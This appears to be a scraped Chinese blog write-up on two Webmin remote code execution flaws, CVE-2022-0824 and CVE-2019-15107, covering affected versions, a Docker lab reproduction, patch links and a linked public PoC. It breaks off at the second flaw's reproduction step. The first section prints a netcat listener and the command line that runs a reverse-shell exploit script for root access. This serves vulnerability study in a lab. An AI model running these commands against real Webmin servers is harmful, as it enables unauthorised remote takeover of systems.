webmin漏洞系列分析与利用

  • Webmin 远程代码执行CVE-2022-0824
    • 编号CVE编号:CVE-2022-0824
    • 影响版本
    • 漏洞简介
    • 复现
      • 拉取漏洞镜像
      • 启动漏洞环境
    • 解决方案
    • POC
    • 相关信息:
  • 远程命令执行漏洞CVE-2019-15107
  • 目标简介
  • 漏洞描述
  • 漏洞利用条件:
  • 漏洞复现
  • 构造POC
  • 构造EXP
  • 漏洞分析
    • 被植入后门依据
  • POC无需管道符
  • 修复建议

Webmin 远程代码执行CVE-2022-0824

编号CVE编号:CVE-2022-0824

CNVD编号:CNVD-2022-17023
 CNNVD编号::CNNVD-202203-076

影响版本

危险等级:高 ( 8.8 HIGH )

POC/EXP:已公开

Webmin Webmin < Webmin Webmin1.990    //1.990版本之前均受影响

漏洞简介

Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。
webmin1.990之前版本存在权限提升漏洞,
该漏洞源于错误的程序对高级本地过程调用。
攻击者可以利用该漏洞能够修改操作系统文件系统并以运行应用程序权限执行操作系统命令。

复现

拉取漏洞镜像

docker pull vulfocus/webmin_cve-2022-0824:latest

启动漏洞环境

docker run -itd -p 10000:10000 -d vulfocus/webmin_cve-2022-0824


访问映射地址127.0.0.1:10000
账户: root 密码: password
环境搭建成功

  监听端口4444,准备获取反弹shellnc -lvp 4444将POC文件下载,并且执行利用脚本python3 Webmin-revshell.py -t http://127.0.0.1:10000 -c root:password -LS 192.168.132.58:9090 -L 192.168.132.58 -P 4444


成功执行命令并且获取root权限

解决方案

更新到最新版本 附带厂商补丁链接:
https://github.com/webmin/webmin/commit/39ea464f0c40b325decd6a5bfb7833fa4a142e38

POC

https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell

相关信息:

https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/

https://nvd.nist.gov/vuln/detail/cve-2022-0824

https://www.cnvd.org.cn/flaw/show/CNVD-2022-17023

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0824

http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202203-076

远程命令执行漏洞CVE-2019-15107

目标简介

Webmin是目前功能最强大的基于Web的Unix系统管理工具。
管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作
http://www.webmin.com/
Webmin让您能够在远程使用支持HTTPS (SSL 上的 HTTP)协议的 Web 浏览器通过 Web界面管理您的主机。
Webmin是一个功能强大且灵活的基于 Web 的服务器管理控制面板,适用于类Unix系统。Webmin允许用户配置操作系统内部,例如用户、磁盘配额、服务或配置文件,以及修改和控制开源应用程序,例如Apache HTTPServer、PHP或MySQL。
Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。
是一个基于Web的界面,用于Unix的系统管理。
使用任何支持表和表单的浏览器,可以设置用户帐户,Apache,DNS,文件共享等。
Linux系统因其高效稳定而受到广大用户的推崇与青睐,然后其管理有一定复杂性和学习周期。
为了降低 Linux系统的管理难度,有时候会对公司内的Linux主机或VPS系统预装了网页管理工具webmin.

  • perl 语法

漏洞描述

该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码
该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码

漏洞利用条件:

版本满足要求

受影响的版本:Webmin<=1.920

且服务器的配置文件允许修改密码时,
在不知道webmin的用户和密码条件下,可以任意执行代码。

漏洞复现

 ┌──(root												

漏洞复现-webmin漏洞系列分析与利用相关推荐

  1. cms漏洞复现-越权漏洞

    cms漏洞复现-越权漏洞 注册一个用户001,并登录上去,打开bp抓包,点击会员空间 关注到如下cookie中两个值,将dedeuserid--ckmd5的值用last_vid_ckmd5的值来进行替 ...

  2. java 漏洞复现_CVE-2019-12384漏洞分析及复现

    原标题:CVE-2019-12384漏洞分析及复现 *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 引言 近期关于Jackson的 ...

  3. [漏洞复现]CVE-2021-26855 漏洞复现及Exchange邮箱详细安装过程

    CVE-2021-26855 漏洞复现及Exchange邮箱详细安装过程 一.介绍 Exchange Server 是微软公司的一套电子邮件服务组件,是个消息与协作系统.2021年03月3日,微软官方 ...

  4. 漏洞复现 - - - Weblogic漏洞(一)

    目录 一,Weblogic简介 二,Weblogic漏洞环境搭建 三,Weblogic弱口令 四,CVE-2014-4210 漏洞环境 漏洞危害 漏洞复现 进行内网存活探测 一,Weblogic简介 ...

  5. 【漏洞复现】CVE-2022-22954 VMware Workspace ONE Access漏洞分析

    文章目录 漏洞信息 漏洞分析 漏洞复现 测试脚本 漏洞修复 参考文章 漏洞信息 VMware Workspace ONE Access(以前称为VMware Identity Manager)旨在通过 ...

  6. webmin漏洞复现集合

    1.CVE-2022-36446(webmin命令注入漏洞复现) webmin简介: ```     Webmin是一款功能强大的基于Web的Unix系统管理工具,管理员可以通过浏览器访问Webmin ...

  7. 【漏洞复现】泛微OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)

    文章目录 前言 声明 一.产品介绍 二.漏洞描述 三.影响范围 四.漏洞分析 五.漏洞复现 六.SQLMAP漏洞利用 七.修复方案 前言 泛微E-Cology v9 Browser.jsp 存在SQL ...

  8. 用友GRP-U8 U8AppProxy任意文件上传漏洞复现+利用

    1.漏洞概述 用友GRP-U8R10行政事业财务管理软件是用友公司专注于电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域专业的财务管理软件.用友 GRP-U8 U8AppProx ...

  9. 通达OA v11.9 getdata任意命令执行漏洞复现+利用

    1.产品简介 通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台.包括流程审批.行政办 ...

最新文章

  1. 2020中国高校毕业生薪资排行出炉!原来有这么多双非院校薪资这么高!
  2. python x y z 1_Python下的数值列表 - range(x,y,z)函数
  3. 2021 有哪些不容错过的后端技术趋势
  4. 【无码专区10】第K大查询(双向链表 /主席树+st表)
  5. Tensorflow2.0 tf.function和AutoGraph模式
  6. tsc - error TS2304 Cannot find name 'Set'/'Promise'
  7. 各大网站猪年新春应景LOGO秀
  8. php min命令,php min函数怎么用 - min
  9. linux测试硬盘的ipos,Linux/Unix平台data-recovery常用的工具
  10. php高强度精密涂覆钢管,电力内外涂覆钢管
  11. android studio 安装sdk和android,请问android studio怎么安装sdk
  12. 一篇很好的面试文章 程序员面试IT公司的33个小贴士
  13. synchronized锁和lock锁 队列中线程执行顺序对比
  14. ROS教程之在自己键盘上控制小海龟移动
  15. CAXA图文档2007服务器端,caxa电子图板2007
  16. 11 从零实现线性回归
  17. 【MATLAB】绘制阶梯图、枝干图
  18. 深度学习英文缩写_机器学习、深度学习……人工智能那些名词你知道几个?
  19. 妖精的尾巴手游快速升级辅助 爱蜂窝自动新手挂机升级
  20. HC-SuK070-C【通信口配置】之CAN

热门文章

  1. logback 使用regex匹配进行日志脱敏
  2. 一入 ‘ 函数 ’ 深似海
  3. 帝国的黄昏(4):彪悍的人生只需要一篇论文
  4. 关于python中的位置参数、关键字参数、可变长位置参数以及可变长关键字参数的详解和他们之间在书写时的顺序的问题,超详细总结的知识点!!!
  5. 703. 数独检查 - AcWing题库
  6. 饿了么胃口大开,京东变盟友还是对手?
  7. proxmark3 IC卡密码bin文件格式分析
  8. pyspider爬虫学习-教程2-AJAX-and-more-HTTP.md
  9. 02. 【Java】语言编程基础
  10. MATLAB算法实战应用案例精讲-【智能优化算法】森林优化算法(FOA) (附MATLAB代码实现)